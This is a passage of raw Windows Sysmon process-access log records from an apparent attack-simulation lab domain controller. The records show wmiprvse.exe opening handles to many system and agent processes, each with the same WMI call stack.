(x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786817Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.205{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786816Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.205{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786815Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.189{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786814Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.189{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786813Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.189{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786812Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.189{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786811Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.189{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786810Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.189{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786809Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.189{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786808Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.189{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786807Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.189{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786806Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.189{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786805Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.189{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786804Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.189{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786803Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.189{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786802Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.189{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786801Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.189{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786800Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.189{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786799Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.189{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786798Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 